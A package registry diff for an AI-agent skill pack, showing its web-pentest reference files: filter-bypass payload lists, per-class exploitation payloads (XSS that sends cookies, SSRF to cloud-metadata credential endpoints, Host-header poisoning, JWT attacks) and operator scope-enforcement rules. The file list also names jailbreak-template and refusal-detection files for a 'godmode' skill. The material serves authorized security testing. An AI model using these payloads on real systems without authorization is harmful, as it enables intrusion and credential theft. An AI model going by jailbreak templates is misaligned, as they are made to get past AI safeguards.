mindforge-cc 11.5.1 → 11.7.0

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Files changed (214) hide show
  1. package/.agent/mindforge/skill-tdd.md +53 -0
  2. package/.agent/mindforge/skills-index.md +118 -0
  3. package/.agent/mindforge/systematic-debug.md +60 -0
  4. package/.agent/mindforge/wf-catalog.md +37 -0
  5. package/.agent/mindforge/wf-code-audit.md +31 -0
  6. package/.agent/mindforge/wf-competitive-analysis.md +31 -0
  7. package/.agent/mindforge/wf-deep-research.md +32 -0
  8. package/.agent/mindforge/wf-feature-planner.md +31 -0
  9. package/.agent/mindforge/wf-incident-response.md +31 -0
  10. package/.agent/mindforge/wf-onboard-codebase.md +31 -0
  11. package/.agent/mindforge/wf-perf-optimize.md +31 -0
  12. package/.agent/mindforge/wf-pr-review.md +31 -0
  13. package/.agent/mindforge/wf-refactor-plan.md +31 -0
  14. package/.agent/mindforge/wf-release-prep.md +31 -0
  15. package/.agent/mindforge/wf-tdd-sprint.md +31 -0
  16. package/.agent/mindforge/wf-tech-evaluation.md +31 -0
  17. package/.agent/skills/1password-skill/SKILL.md +156 -0
  18. package/.agent/skills/1password-skill/references/cli-examples.md +31 -0
  19. package/.agent/skills/1password-skill/references/get-started.md +21 -0
  20. package/.agent/skills/article-illustrator/SKILL.md +199 -0
  21. package/.agent/skills/article-illustrator/references/prompt-construction.md +426 -0
  22. package/.agent/skills/article-illustrator/references/style-presets.md +80 -0
  23. package/.agent/skills/article-illustrator/references/styles.md +224 -0
  24. package/.agent/skills/article-illustrator/references/usage.md +50 -0
  25. package/.agent/skills/article-illustrator/references/workflow.md +332 -0
  26. package/.agent/skills/arxiv/SKILL.md +275 -0
  27. package/.agent/skills/blogwatcher/SKILL.md +130 -0
  28. package/.agent/skills/code-wiki/SKILL.md +438 -0
  29. package/.agent/skills/code-wiki/templates/README.md +31 -0
  30. package/.agent/skills/code-wiki/templates/architecture.md +30 -0
  31. package/.agent/skills/code-wiki/templates/getting-started.md +47 -0
  32. package/.agent/skills/code-wiki/templates/module.md +38 -0
  33. package/.agent/skills/codebase-inspection/SKILL.md +109 -0
  34. package/.agent/skills/comic-creator/SKILL.md +240 -0
  35. package/.agent/skills/comic-creator/references/analysis-framework.md +176 -0
  36. package/.agent/skills/comic-creator/references/auto-selection.md +71 -0
  37. package/.agent/skills/comic-creator/references/base-prompt.md +98 -0
  38. package/.agent/skills/comic-creator/references/character-template.md +180 -0
  39. package/.agent/skills/comic-creator/references/ohmsha-guide.md +85 -0
  40. package/.agent/skills/comic-creator/references/partial-workflows.md +106 -0
  41. package/.agent/skills/comic-creator/references/storyboard-template.md +143 -0
  42. package/.agent/skills/comic-creator/references/workflow.md +401 -0
  43. package/.agent/skills/concept-diagrams/SKILL.md +355 -0
  44. package/.agent/skills/concept-diagrams/references/dashboard-patterns.md +43 -0
  45. package/.agent/skills/concept-diagrams/references/infrastructure-patterns.md +144 -0
  46. package/.agent/skills/concept-diagrams/references/physical-shape-cookbook.md +42 -0
  47. package/.agent/skills/creative-ideation/SKILL.md +144 -0
  48. package/.agent/skills/creative-ideation/references/full-prompt-library.md +110 -0
  49. package/.agent/skills/devops-cli/SKILL.md +149 -0
  50. package/.agent/skills/devops-cli/references/app-discovery.md +112 -0
  51. package/.agent/skills/devops-cli/references/authentication.md +59 -0
  52. package/.agent/skills/devops-cli/references/cli-reference.md +104 -0
  53. package/.agent/skills/devops-cli/references/running-apps.md +171 -0
  54. package/.agent/skills/devops-watchers/SKILL.md +103 -0
  55. package/.agent/skills/docker-management/SKILL.md +273 -0
  56. package/.agent/skills/domain-intel/SKILL.md +96 -0
  57. package/.agent/skills/duckduckgo-search/SKILL.md +230 -0
  58. package/.agent/skills/github-auth/SKILL.md +240 -0
  59. package/.agent/skills/github-code-review/SKILL.md +474 -0
  60. package/.agent/skills/github-code-review/references/review-output-template.md +74 -0
  61. package/.agent/skills/github-issues/SKILL.md +363 -0
  62. package/.agent/skills/github-issues/templates/bug-report.md +35 -0
  63. package/.agent/skills/github-issues/templates/feature-request.md +31 -0
  64. package/.agent/skills/github-pr-workflow/SKILL.md +360 -0
  65. package/.agent/skills/github-pr-workflow/references/ci-troubleshooting.md +183 -0
  66. package/.agent/skills/github-pr-workflow/references/conventional-commits.md +71 -0
  67. package/.agent/skills/github-pr-workflow/templates/pr-body-bugfix.md +35 -0
  68. package/.agent/skills/github-pr-workflow/templates/pr-body-feature.md +33 -0
  69. package/.agent/skills/github-repo-management/SKILL.md +509 -0
  70. package/.agent/skills/github-repo-management/references/github-api-cheatsheet.md +161 -0
  71. package/.agent/skills/godmode/SKILL.md +396 -0
  72. package/.agent/skills/godmode/references/jailbreak-templates.md +128 -0
  73. package/.agent/skills/godmode/references/refusal-detection.md +142 -0
  74. package/.agent/skills/hyperframes/SKILL.md +182 -0
  75. package/.agent/skills/hyperframes/references/cli.md +185 -0
  76. package/.agent/skills/hyperframes/references/composition.md +129 -0
  77. package/.agent/skills/hyperframes/references/features.md +289 -0
  78. package/.agent/skills/hyperframes/references/gsap.md +136 -0
  79. package/.agent/skills/hyperframes/references/troubleshooting.md +137 -0
  80. package/.agent/skills/hyperframes/references/website-to-video.md +145 -0
  81. package/.agent/skills/jupyter-live-kernel/SKILL.md +160 -0
  82. package/.agent/skills/kanban-orchestrator/SKILL.md +209 -0
  83. package/.agent/skills/kanban-worker/SKILL.md +188 -0
  84. package/.agent/skills/llm-wiki/SKILL.md +499 -0
  85. package/.agent/skills/meme-generation/SKILL.md +122 -0
  86. package/.agent/skills/node-inspect-debugger/SKILL.md +312 -0
  87. package/.agent/skills/obsidian/SKILL.md +60 -0
  88. package/.agent/skills/osint-investigation/SKILL.md +269 -0
  89. package/.agent/skills/osint-investigation/templates/source-template.md +59 -0
  90. package/.agent/skills/oss-forensics/SKILL.md +422 -0
  91. package/.agent/skills/oss-forensics/references/evidence-types.md +89 -0
  92. package/.agent/skills/oss-forensics/references/github-archive-guide.md +184 -0
  93. package/.agent/skills/oss-forensics/references/investigation-templates.md +131 -0
  94. package/.agent/skills/oss-forensics/references/recovery-techniques.md +164 -0
  95. package/.agent/skills/oss-forensics/templates/forensic-report.md +151 -0
  96. package/.agent/skills/oss-forensics/templates/malicious-package-report.md +43 -0
  97. package/.agent/skills/parallel-cli/SKILL.md +384 -0
  98. package/.agent/skills/pinggy-tunnel/SKILL.md +302 -0
  99. package/.agent/skills/pixel-art/SKILL.md +209 -0
  100. package/.agent/skills/pixel-art/references/palettes.md +49 -0
  101. package/.agent/skills/plan/SKILL.md +331 -0
  102. package/.agent/skills/polymarket/SKILL.md +75 -0
  103. package/.agent/skills/polymarket/references/api-endpoints.md +220 -0
  104. package/.agent/skills/python-debugpy/SKILL.md +368 -0
  105. package/.agent/skills/requesting-code-review/SKILL.md +273 -0
  106. package/.agent/skills/research-paper-writing/SKILL.md +2367 -0
  107. package/.agent/skills/research-paper-writing/references/autoreason-methodology.md +394 -0
  108. package/.agent/skills/research-paper-writing/references/checklists.md +434 -0
  109. package/.agent/skills/research-paper-writing/references/citation-workflow.md +563 -0
  110. package/.agent/skills/research-paper-writing/references/experiment-patterns.md +728 -0
  111. package/.agent/skills/research-paper-writing/references/human-evaluation.md +476 -0
  112. package/.agent/skills/research-paper-writing/references/paper-types.md +481 -0
  113. package/.agent/skills/research-paper-writing/references/reviewer-guidelines.md +433 -0
  114. package/.agent/skills/research-paper-writing/references/sources.md +191 -0
  115. package/.agent/skills/research-paper-writing/references/writing-guide.md +474 -0
  116. package/.agent/skills/research-paper-writing/templates/README.md +251 -0
  117. package/.agent/skills/rest-graphql-debug/SKILL.md +507 -0
  118. package/.agent/skills/s6-container-supervision/SKILL.md +171 -0
  119. package/.agent/skills/scrapling/SKILL.md +328 -0
  120. package/.agent/skills/sherlock/SKILL.md +186 -0
  121. package/.agent/skills/simplify-code/SKILL.md +168 -0
  122. package/.agent/skills/skill-authoring/SKILL.md +158 -0
  123. package/.agent/skills/spike/SKILL.md +190 -0
  124. package/.agent/skills/subagent-driven-development/SKILL.md +345 -0
  125. package/.agent/skills/subagent-driven-development/references/context-budget-discipline.md +53 -0
  126. package/.agent/skills/subagent-driven-development/references/gates-taxonomy.md +93 -0
  127. package/.agent/skills/systematic-debugging/SKILL.md +360 -0
  128. package/.agent/skills/test-driven-development/SKILL.md +336 -0
  129. package/.agent/skills/video-orchestrator/SKILL.md +194 -0
  130. package/.agent/skills/video-orchestrator/references/examples.md +227 -0
  131. package/.agent/skills/video-orchestrator/references/intake.md +166 -0
  132. package/.agent/skills/video-orchestrator/references/kanban-setup.md +278 -0
  133. package/.agent/skills/video-orchestrator/references/monitoring.md +180 -0
  134. package/.agent/skills/video-orchestrator/references/role-archetypes.md +298 -0
  135. package/.agent/skills/video-orchestrator/references/tool-matrix.md +317 -0
  136. package/.agent/skills/web-pentest/SKILL.md +332 -0
  137. package/.agent/skills/web-pentest/references/bypass-techniques.md +133 -0
  138. package/.agent/skills/web-pentest/references/exploitation-techniques.md +204 -0
  139. package/.agent/skills/web-pentest/references/scope-enforcement.md +110 -0
  140. package/.agent/skills/web-pentest/references/vuln-taxonomy.md +81 -0
  141. package/.agent/skills/web-pentest/templates/authorization.md +69 -0
  142. package/.agent/skills/web-pentest/templates/pentest-report.md +178 -0
  143. package/.claude/commands/mindforge/skill-tdd.md +53 -0
  144. package/.claude/commands/mindforge/skills-index.md +118 -0
  145. package/.claude/commands/mindforge/systematic-debug.md +60 -0
  146. package/.claude/commands/mindforge/wf-catalog.md +37 -0
  147. package/.claude/commands/mindforge/wf-code-audit.md +31 -0
  148. package/.claude/commands/mindforge/wf-competitive-analysis.md +31 -0
  149. package/.claude/commands/mindforge/wf-deep-research.md +32 -0
  150. package/.claude/commands/mindforge/wf-feature-planner.md +31 -0
  151. package/.claude/commands/mindforge/wf-incident-response.md +31 -0
  152. package/.claude/commands/mindforge/wf-onboard-codebase.md +31 -0
  153. package/.claude/commands/mindforge/wf-perf-optimize.md +31 -0
  154. package/.claude/commands/mindforge/wf-pr-review.md +31 -0
  155. package/.claude/commands/mindforge/wf-refactor-plan.md +31 -0
  156. package/.claude/commands/mindforge/wf-release-prep.md +31 -0
  157. package/.claude/commands/mindforge/wf-tdd-sprint.md +31 -0
  158. package/.claude/commands/mindforge/wf-tech-evaluation.md +31 -0
  159. package/.mindforge/config.json +2 -2
  160. package/.mindforge/dynamic-workflows/REGISTRY.md +65 -0
  161. package/.mindforge/dynamic-workflows/index.json +171 -0
  162. package/.mindforge/dynamic-workflows/scripts/code-audit.js +103 -0
  163. package/.mindforge/dynamic-workflows/scripts/competitive-analysis.js +85 -0
  164. package/.mindforge/dynamic-workflows/scripts/deep-research.js +151 -0
  165. package/.mindforge/dynamic-workflows/scripts/feature-planner.js +104 -0
  166. package/.mindforge/dynamic-workflows/scripts/incident-response.js +106 -0
  167. package/.mindforge/dynamic-workflows/scripts/onboard-codebase.js +102 -0
  168. package/.mindforge/dynamic-workflows/scripts/perf-optimize.js +128 -0
  169. package/.mindforge/dynamic-workflows/scripts/pr-review.js +87 -0
  170. package/.mindforge/dynamic-workflows/scripts/refactor-plan.js +121 -0
  171. package/.mindforge/dynamic-workflows/scripts/release-prep.js +102 -0
  172. package/.mindforge/dynamic-workflows/scripts/tdd-sprint.js +103 -0
  173. package/.mindforge/dynamic-workflows/scripts/tech-evaluation.js +72 -0
  174. package/.mindforge/memory/sync-manifest.json +1 -1
  175. package/.mindforge/skills/arxiv/SKILL.md +294 -0
  176. package/.mindforge/skills/blogwatcher/SKILL.md +147 -0
  177. package/.mindforge/skills/code-wiki/SKILL.md +457 -0
  178. package/.mindforge/skills/codebase-inspection/SKILL.md +126 -0
  179. package/.mindforge/skills/concept-diagrams/SKILL.md +373 -0
  180. package/.mindforge/skills/creative-ideation/SKILL.md +162 -0
  181. package/.mindforge/skills/domain-intel/SKILL.md +116 -0
  182. package/.mindforge/skills/duckduckgo-search/SKILL.md +249 -0
  183. package/.mindforge/skills/github-code-review/SKILL.md +493 -0
  184. package/.mindforge/skills/github-issues/SKILL.md +382 -0
  185. package/.mindforge/skills/github-pr-workflow/SKILL.md +379 -0
  186. package/.mindforge/skills/jupyter-live-kernel/SKILL.md +179 -0
  187. package/.mindforge/skills/kanban-orchestrator/SKILL.md +227 -0
  188. package/.mindforge/skills/kanban-worker/SKILL.md +206 -0
  189. package/.mindforge/skills/meme-generation/SKILL.md +141 -0
  190. package/.mindforge/skills/obsidian/SKILL.md +80 -0
  191. package/.mindforge/skills/osint-investigation/SKILL.md +288 -0
  192. package/.mindforge/skills/oss-forensics/SKILL.md +421 -0
  193. package/.mindforge/skills/pixel-art/SKILL.md +228 -0
  194. package/.mindforge/skills/plan/SKILL.md +350 -0
  195. package/.mindforge/skills/requesting-code-review/SKILL.md +292 -0
  196. package/.mindforge/skills/research-paper-writing/SKILL.md +2384 -0
  197. package/.mindforge/skills/scrapling/SKILL.md +345 -0
  198. package/.mindforge/skills/sherlock/SKILL.md +203 -0
  199. package/.mindforge/skills/simplify-code/SKILL.md +187 -0
  200. package/.mindforge/skills/spike/SKILL.md +209 -0
  201. package/.mindforge/skills/subagent-driven-development/SKILL.md +364 -0
  202. package/.mindforge/skills/systematic-debugging/SKILL.md +379 -0
  203. package/.mindforge/skills/test-driven-development/SKILL.md +355 -0
  204. package/.mindforge/skills/web-pentest/SKILL.md +327 -0
  205. package/CHANGELOG.md +71 -0
  206. package/MINDFORGE.md +2 -2
  207. package/README.md +72 -3
  208. package/RELEASENOTES.md +109 -0
  209. package/bin/installer-core.js +6 -2
  210. package/bin/mindforge-cli.js +7 -0
  211. package/bin/workflows/workflow-runner.js +110 -0
  212. package/docs/commands-reference.md +25 -0
  213. package/docs/getting-started.md +42 -5
  214. package/package.json +2 -1
@@ -0,0 +1,133 @@
1
+ # Bypass Techniques
2
+
3
+ Common filter/WAF bypasses. Used during the bypass-exhaustion phase
4
+ before classifying a finding as false positive.
5
+
6
+ A finding may only be marked `false_positive` AFTER the relevant
7
+ bypass set has been exhausted and the witnesses still fail.
8
+
9
+ ## SQL Injection Bypasses
10
+
11
+ When `'` is filtered/escaped:
12
+ - Numeric injection: drop the quote, use `1 OR 1=1`
13
+ - Different quote: `"` instead of `'`
14
+ - Comment-based: `1/**/OR/**/1=1`
15
+ - Hex literal: `0x61646d696e` for `admin`
16
+ - `CHAR(65,66)` for `AB`
17
+ - Case variation: `OoRr` (often stripped to `OR`)
18
+ - Inline comments: `O/**/R`
19
+ - Null byte: `' %00 OR '1`=`1`
20
+ - Double URL encoding: `%2527` for `'`
21
+ - Multi-byte: `%bf%27` (works against some single-byte unescape)
22
+
23
+ ## Command Injection Bypasses
24
+
25
+ When semicolons filtered:
26
+ - Newline: `%0Asleep 5`
27
+ - Carriage return: `%0Dsleep 5`
28
+ - Pipe: `|sleep 5`, `||sleep 5`
29
+ - Background: `&sleep 5`, `&&sleep 5`
30
+ - Substitution: `$(sleep 5)`, `` `sleep 5` ``
31
+ - Globbing: `/???/?l??p 5` for `/bin/sleep 5`
32
+ - IFS for spaces: `sleep${IFS}5`, `sleep$IFS$95`
33
+ - Quote evasion: `s""leep 5`, `s'l'eep 5`
34
+ - Variable: `a=sl;b=eep;${a}${b} 5`
35
+ - Encoding: `bash<<<$(base64 -d <<< c2xlZXAgNQo=)`
36
+
37
+ ## Path Traversal Bypasses
38
+
39
+ When `../` filtered:
40
+ - URL-encoded: `%2e%2e%2f`
41
+ - Double URL-encoded: `%252e%252e%252f`
42
+ - Unicode: `%c0%ae%c0%ae%c0%af`, `%uff0e%uff0e%u2215`
43
+ - Mixed: `..%2f`, `%2e./`
44
+ - Null byte (older platforms): `../../../etc/passwd%00.png`
45
+ - Backslash on Windows: `..\..\..\windows\win.ini`
46
+ - Absolute path: `/etc/passwd` (skips traversal entirely)
47
+
48
+ When base dir is prepended (`/var/www/uploads/${v}`):
49
+ - The traversal still works if `realpath` not enforced
50
+ - Try ending the path early: `../../etc/passwd%00`
51
+
52
+ ## XSS Bypasses
53
+
54
+ When `<script>` blocked:
55
+ - `<img src=x onerror=...>`
56
+ - `<svg/onload=...>`
57
+ - `<iframe srcdoc="...">`
58
+ - `<details ontoggle=...>` (HTML5)
59
+ - `<video><source onerror=...>`
60
+ - `<input autofocus onfocus=...>`
61
+
62
+ When parens filtered:
63
+ - Template literals: `onerror=alert\`1\``
64
+ - `onerror=eval('alert(1)')` → `onerror=eval(name)` + set
65
+ `window.name` from attacker page
66
+
67
+ When event handlers stripped:
68
+ - `<a href="javascript:alert(1)">` (often still works)
69
+ - `<form action="javascript:alert(1)"><input type=submit>`
70
+ - SVG: `<svg><animate attributeName=href values=javascript:alert(1) ...>`
71
+
72
+ When `alert` filtered:
73
+ - `confirm(1)`, `prompt(1)`, `print()`
74
+ - `top.alert(1)`, `self['ale'+'rt'](1)`
75
+ - `window['ale\u0072t'](1)` (unicode in property access)
76
+ - `Function("alert(1)")()`
77
+
78
+ CSP bypasses (require CSP misconfig):
79
+ - `unsafe-inline` allows everything
80
+ - `unsafe-eval` allows `eval`/`Function`
81
+ - Wildcard sources (`*.googleapis.com`) — angular/jsonp gadgets
82
+ - `'strict-dynamic'` without nonce/hash on inline → still blocked but
83
+ external scripts allowed via trusted loader
84
+ - Old CSP without `default-src`/`script-src` → only blocks listed
85
+
86
+ ## Authentication Bypasses
87
+
88
+ - HTTP verb tampering: `GET /admin` blocked → try `POST`, `PUT`, `OPTIONS`
89
+ - Path normalization: `/admin/` blocked → try `/admin`, `/admin/.`,
90
+ `/admin/x/..`, `//admin`, `/%2e/admin`, `/Admin` (case)
91
+ - Header injection: `X-Original-URL: /admin`, `X-Forwarded-For: 127.0.0.1`,
92
+ `X-Real-IP: 127.0.0.1`, `X-Forwarded-Proto: https`
93
+ - Trailing chars: `/admin#`, `/admin?`, `/admin/`, `/admin.json`,
94
+ `/admin..;/`, `/admin/..;/`
95
+ - Method confusion via `X-HTTP-Method-Override: GET`
96
+
97
+ ## SSRF Bypasses
98
+
99
+ When `127.0.0.1` blocked:
100
+ - IPv6 loopback: `[::1]`, `[0:0:0:0:0:0:0:1]`
101
+ - Decimal IP: `2130706433` for `127.0.0.1`
102
+ - Hex IP: `0x7f000001`
103
+ - Octal: `0177.0.0.1`
104
+ - Short form: `127.1`, `0.0.0.0`, `0`
105
+ - DNS rebinding: control a DNS server, return `127.0.0.1` on second
106
+ resolution (TTL=0)
107
+ - DNS records that resolve to internal IPs: `localtest.me` (127.0.0.1)
108
+ - URL parsing differentials: `http://allowed-host@127.0.0.1`,
109
+ `http://127.0.0.1#@allowed-host`
110
+ - IDN homograph: `http://1.0.0.1` (fullwidth dots)
111
+
112
+ When schemes blocked:
113
+ - `gopher://`, `dict://`, `file://`, `ftp://`
114
+ - `data:` (for content-type bypass)
115
+ - `jar:` (Java)
116
+
117
+ ## Rate Limit Bypasses
118
+
119
+ - Header rotation: `X-Forwarded-For`, `X-Real-IP`, `X-Originating-IP`,
120
+ `X-Client-IP`, `X-Cluster-Client-IP`, `Forwarded`
121
+ - Case: `X-FORWARDED-FOR`
122
+ - User-Agent variation
123
+ - Different endpoint that hits same handler
124
+
125
+ ## Bypass Discipline
126
+
127
+ For each bypass attempt:
128
+ 1. Note WHAT you tried and WHY it might work (in your evidence log)
129
+ 2. Capture the response
130
+ 3. If still blocked, move to the next item in the bypass set
131
+ 4. Only after the documented bypass set is exhausted do you write
132
+ `verdict: false_positive` with reason "bypass set exhausted; defense
133
+ appears effective for this slot type."
@@ -0,0 +1,204 @@
1
+ # Exploitation Techniques
2
+
3
+ Per-class playbooks. Use these as starting points for witness payloads.
4
+ ALWAYS apply scope enforcement before sending anything from this file.
5
+
6
+ ## Injection
7
+
8
+ ### SQL Injection
9
+
10
+ Witness sequence (UNION-blind safe):
11
+ 1. Baseline: capture response for original parameter
12
+ 2. `' AND 1=1--` (true branch)
13
+ 3. `' AND 1=2--` (false branch)
14
+ 4. Compare lengths/bodies. Difference = SQLi.
15
+
16
+ Time-based:
17
+ - MySQL: `' AND SLEEP(5)--`
18
+ - Postgres: `'; SELECT pg_sleep(5)--`
19
+ - MSSQL: `'; WAITFOR DELAY '0:0:5'--`
20
+ - SQLite: `' AND randomblob(100000000)--` (CPU-burn alternative)
21
+
22
+ DO NOT send: `'; DROP TABLE` payloads. Reproducing the bug doesn't
23
+ require destruction.
24
+
25
+ ### Command Injection
26
+
27
+ Witness:
28
+ - Linux: `; sleep 5` or `$(sleep 5)` or `` `sleep 5` ``
29
+ - Windows: `& timeout /t 5`
30
+ - If output is reflected: `; echo HERMESPENTEST-$(id)`
31
+
32
+ Blind: time-delay probe is universally safe. Don't `rm -rf`.
33
+
34
+ ### Path Traversal
35
+
36
+ Witness: `../../../../etc/passwd` (Linux) or `..\..\..\..\windows\win.ini` (Windows).
37
+ Try with: URL-encoded, double-encoded, Unicode (`%c0%ae%c0%ae`),
38
+ and SMB UNC (`\\evil-host\share` — only with operator OK).
39
+
40
+ ### SSTI (Server-Side Template Injection)
41
+
42
+ Witness:
43
+ - Jinja2: `{{7*7}}` → `49`
44
+ - Twig: `{{7*7}}` → `49`
45
+ - Smarty: `{$smarty.version}` or `{php}echo 1;{/php}`
46
+ - ERB: `<%= 7*7 %>` → `49`
47
+ - Velocity: `#set($x=7*7)$x`
48
+
49
+ Detection is the 49 (or template-specific equivalent). Don't go to RCE
50
+ without operator OK.
51
+
52
+ ### Deserialization
53
+
54
+ If you can identify the format:
55
+ - Pickle: send `cos\nsystem\n(S'sleep 5'\ntR.` (base64'd, in the
56
+ right context). Witness via time delay.
57
+ - YAML: `!!python/object/apply:os.system ["sleep 5"]`
58
+ - Java serialized: ysoserial gadgets, only with operator OK because
59
+ these almost always RCE.
60
+
61
+ ## XSS
62
+
63
+ ### Reflected
64
+
65
+ Witness: `<svg/onload=fetch("/HERMES-PENTEST-XSS-"+document.cookie)>`
66
+ where the path is one you'll grep for in server logs. NEVER use
67
+ `alert(1)` — pop-ups annoy real users if your "test" target has any.
68
+
69
+ If reflected unencoded → L3 confirmed.
70
+
71
+ ### Stored
72
+
73
+ Witness in a way that ONLY YOUR test account sees first. Use a unique
74
+ marker per finding. If the marker fires for other users → L4 critical.
75
+
76
+ Pattern: `<svg/onload=fetch("/HERMES-${runId}-${vulnId}")>`. Add a
77
+ server-side log grep step to your evidence.
78
+
79
+ ### DOM XSS
80
+
81
+ Inspect every `document.write`, `innerHTML`, `eval`, `setTimeout(string)`,
82
+ `Function(string)`, `setAttribute("href", ...)` site. The taint source
83
+ is usually `location.hash`, `location.search`, `localStorage`,
84
+ `postMessage` data, URL fragments.
85
+
86
+ Witness: navigate to `#<img src=x onerror=...>`. Confirm the
87
+ sink fires.
88
+
89
+ ## Auth
90
+
91
+ ### Login Bypass
92
+
93
+ - SQLi in login: `' OR '1'='1` (very old, but check)
94
+ - Boolean defaults: `username: admin, password: admin/password/123456`
95
+ (only on lab targets, not production)
96
+ - Account enumeration: timing or response difference between
97
+ "unknown user" vs "wrong password"
98
+ - Rate limiting: send 50 wrong passwords in 30s; see if you're throttled
99
+
100
+ ### JWT Attacks
101
+
102
+ 1. **alg:none**: change header to `{"alg":"none","typ":"JWT"}`, strip
103
+ signature. If accepted → critical.
104
+ 2. **alg confusion**: HS256 signed with the RS256 public key. If the
105
+ server stores the RS256 cert as a "secret" and the algorithm is
106
+ attacker-controlled, this works.
107
+ 3. **Weak HMAC secret**: try `jwt_tool` or `hashcat` against the JWT
108
+ with rockyou.txt (only if you have operator OK to crack).
109
+ 4. **kid header injection**: `kid` set to a SQLi payload or path-traversal
110
+ to load a known key.
111
+ 5. **Expired token still accepted**: replay an old token.
112
+
113
+ ### Session
114
+
115
+ - Cookie attrs: `Secure`, `HttpOnly`, `SameSite=Strict|Lax`.
116
+ - Session fixation: log in, note cookie, log out, log in again — same
117
+ cookie? Vulnerable.
118
+ - Logout: does logout invalidate server-side, or just clear the client?
119
+
120
+ ### Password Reset
121
+
122
+ - Predictable token (timestamp, sequential, weak random)
123
+ - Host header poisoning in reset link (`Host: evil.test`)
124
+ - No rate limit on reset endpoint
125
+ - Token reuse / no expiry
126
+ - Email enumeration via reset response
127
+
128
+ ## Authz (Access Control)
129
+
130
+ ### IDOR
131
+
132
+ Pattern: change `?id=123` to `?id=124`. If you see another user's data,
133
+ L3 confirmed.
134
+
135
+ Variants:
136
+ - Sequential IDs (easy)
137
+ - UUIDs (still try — they leak in logs/responses)
138
+ - Mass assignment: send extra params like `is_admin: true`, `role: admin`
139
+ - HTTP method override: `GET /users/123` works, but `PUT /users/123` is
140
+ not authz-checked
141
+
142
+ ### Privilege Escalation
143
+
144
+ Vertical: regular user → admin endpoint. Check:
145
+ - `/admin/*` accessible to non-admin?
146
+ - `role` field in JWT/session client-editable?
147
+ - Tenant ID swap: `tenant_id=mine` → `tenant_id=theirs`
148
+
149
+ Horizontal: user A → user B same role. Reuse IDOR patterns.
150
+
151
+ ### Business Logic
152
+
153
+ - Negative quantity in cart
154
+ - Race conditions (double-spend, atomicity)
155
+ - Workflow skip (POST to step 3 without doing step 2)
156
+ - Coupon stacking
157
+ - Discount > total
158
+
159
+ ## SSRF
160
+
161
+ Witnesses for SSRF probing (only to hosts the operator approved):
162
+
163
+ - Operator-owned callback (`https://hermes-callback.example/abcdef`)
164
+ — confirms the request left the target's network
165
+ - Internal recon (operator OK + scope): `http://127.0.0.1:6379/`,
166
+ `http://127.0.0.1:9200/`, `http://[::1]:80/`
167
+
168
+ Cloud metadata (operator OK + your own infra):
169
+ - AWS: `http://169.254.169.254/latest/meta-data/iam/security-credentials/`
170
+ - GCP: `http://metadata.google.internal/computeMetadata/v1/` (needs
171
+ `Metadata-Flavor: Google`)
172
+ - Azure: `http://169.254.169.254/metadata/identity/oauth2/token`
173
+ - Alibaba/Aliyun: `http://100.100.100.200/`
174
+
175
+ Protocol smuggling:
176
+ - `gopher://` for Redis/Memcache/SMTP attacks (only with operator OK)
177
+ - `file:///` for local file read
178
+ - `dict://` for service probing
179
+
180
+ ## Infra
181
+
182
+ - Headers audit: missing `Strict-Transport-Security`, `Content-Security-Policy`,
183
+ `X-Content-Type-Options: nosniff`, `X-Frame-Options`/`frame-ancestors`,
184
+ `Referrer-Policy`
185
+ - TLS audit: weak ciphers, missing HSTS, mixed content
186
+ - Information disclosure: `Server:`, `X-Powered-By:`, error stack traces,
187
+ default landing pages (`/server-status`, `/.git/`, `/.env`, `/phpinfo.php`)
188
+ - Default creds: only on lab targets
189
+ - Open redirects: `?next=https://evil.example/` — confirms misuse for
190
+ phishing chains
191
+
192
+ ## Defense Recognition (don't waste cycles)
193
+
194
+ Skip past these — they're working defenses, not vulns:
195
+
196
+ - Parameterized queries via the language's standard binding
197
+ - Content Security Policy with no `unsafe-inline`/`unsafe-eval` and
198
+ a strict source list
199
+ - argv-list subprocess invocation (Python `subprocess.run([...])`
200
+ without `shell=True`)
201
+ - `yaml.safe_load`, JSON-only deserialization
202
+ - Allowlist-based redirects to a small set of known hosts
203
+ - Auth checks with explicit "owner == current_user" on every record fetch
204
+ - JWT verification with both `alg` allowlist and `iss`/`aud`/`exp` checks
@@ -0,0 +1,110 @@
1
+ # Scope Enforcement
2
+
3
+ The pentest skill is dangerous because the agent can drive network tools
4
+ unattended. The single most important rule: **every active request must
5
+ target a host the operator authorized.** This file is the procedure.
6
+
7
+ ## The Three Authorities
8
+
9
+ 1. `engagement/authorization.md` — what the operator wrote down.
10
+ 2. `engagement/scope.txt` — the machine-readable allowlist.
11
+ 3. The current shell prompt — implicit: "I'm running inside
12
+ the operator's box."
13
+
14
+ If any of those three disagree, you STOP and ask. Don't try to reconcile.
15
+
16
+ ## scope.txt format
17
+
18
+ One target per line. Comments with `#`.
19
+
20
+ ```
21
+ # Hostnames — resolved at use time
22
+ localhost
23
+ 127.0.0.1
24
+ ::1
25
+ staging.example.com
26
+ api-staging.example.com
27
+
28
+ # CIDR — internal labs only, requires operator OK in writing
29
+ 192.168.50.0/24
30
+ 10.0.5.0/24
31
+ ```
32
+
33
+ Wildcards are NOT supported. If you need `*.staging.example.com`, list
34
+ each host explicitly. This is on purpose: subdomain wildcards in
35
+ authorization scope are how unauthorized testing happens.
36
+
37
+ ## Host Extraction Rules
38
+
39
+ Before any active request, extract the target host from the command
40
+ or URL and confirm it's in scope.
41
+
42
+ | Surface | Where the host lives | Example |
43
+ |---------|----------------------|---------|
44
+ | `curl URL` | The URL | `curl https://staging.example.com/login` |
45
+ | `curl --resolve HOST:PORT:ADDR` | HOST | reject — resolve overrides scope |
46
+ | `nmap TARGET` | Each TARGET arg | `nmap 10.0.5.5 staging.example.com` |
47
+ | `whatweb URL` | The URL | `whatweb https://staging.example.com` |
48
+ | `browser_navigate(url)` | The URL | python-side: extract host from `url` |
49
+ | Tool-driven HTTP (sqlmap, wfuzz, gobuster) | `-u`, `-h`, target arg | depends on tool |
50
+
51
+ For URLs: `urllib.parse.urlparse(url).hostname.lower()`.
52
+ For raw IPs: keep as IP, check against CIDR entries with
53
+ `ipaddress.ip_address(host) in ipaddress.ip_network(cidr)`.
54
+
55
+ ## Pre-Send Checklist
56
+
57
+ For every active request, before you press enter:
58
+
59
+ 1. Did you extract the host correctly? (URL host, not Host header, not
60
+ `--resolve` aliasing.)
61
+ 2. Is the host in scope.txt (exact hostname match) OR is its resolved
62
+ IP in a scope.txt CIDR?
63
+ 3. If it's a redirect target you're following, did you re-check scope
64
+ on the redirect URL?
65
+ 4. If it's the second hop of an SSRF probe, is the inner URL in scope?
66
+ (Usually NOT — that's the whole point. Don't auto-fire.)
67
+ 5. Did the operator approve this class of payload? (Read-only recon
68
